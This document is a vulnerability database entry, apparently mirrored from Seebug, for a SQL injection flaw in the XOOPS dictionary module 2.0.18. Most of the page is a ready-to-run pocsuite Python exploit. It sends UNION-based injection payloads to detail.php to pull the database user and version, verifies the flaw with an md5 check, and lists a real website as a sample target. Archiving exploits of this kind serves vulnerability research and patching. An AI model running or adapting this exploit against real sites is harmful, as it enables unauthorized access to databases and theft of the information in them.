Lucene search
K

XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability

🗓️ 30 Dec 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 19 Views

XOOPS Module dictionary 2.0.18 SQL Injection Vulnerability in (detail.php) allows remote attackers to execute SQL commands and obtain sensitive information

Code

                                                #!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '18845'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2009-12-30'
    createDate = '2016-01-07'
    updateDate = '2016-01-07'
    references = ['http://www.sebug.net/vuldb/ssvid-18845']
    name = 'XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability'
    appPowerLink = 'http://www.xoops.org'
    appName = 'Xoops'
    appVersion = '2.0.18'
    vulType = 'SQL injection'
    desc = '''
        XOOPS Module dictionary V2.0.18版本在/modules/dictionary/detail.php处由于
        对参数id过滤不严格,导致存在SQL注入漏洞。远程攻击者可以结合Union方式,
        注入SQL指令,获取敏感信息。
    '''
    samples = ['http://www.arthealing.tw']

    def _attack(self):
        #利用SQL注入读取数据库信息
        result = {}
        #访问的地址
        exploit='/modules/dictionary/detail.php?id='
        #利用Union方式读取数据库信息
        payload="-885+union+select+1,2,3,concat(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24),5,6--"
        #构造漏洞利用连接
        vulurl=self.url+exploit+payload
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #提取信息的正则表达式
        parttern='\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
        #发送请求
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查返回结果
        if resp.status_code==200:
            #提取信息
            match=re.search(parttern,resp.content,re.M|re.I)
            if match:
                #漏洞利用成功
                result['DatabaseInfo']={}
                #数据库用户名
                result['DatabaseInfo']['Username']=match.group(1)
                #数据库版本
                result['DatabaseInfo']['Version']=match.group(2)
        return self.parse_output(result)

    def _verify(self):
        #通过计算md5(1)的值,来验证SQL注入
        result = {}
        #访问的地址
        exploit='/modules/dictionary/detail.php?id='
        #利用Union方式(计算md5(1))
        payload="-885+union+select+1,2,3,md5(1),5,6--"
        #构造漏洞利用连接
        vulurl=self.url+exploit+payload
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #发送请求
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查是否含有特征字符串(md5(1)=c4ca4238a0b923820dcc509a6f75849b)
        if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
            #漏洞验证成功
            result['VerifyInfo']={}
            result['VerifyInfo']['URL'] = self.url+exploit
            result['VerifyInfo']['Payload'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Dec 2009 00:00Current
7.1High risk
Vulners AI Score7.1
19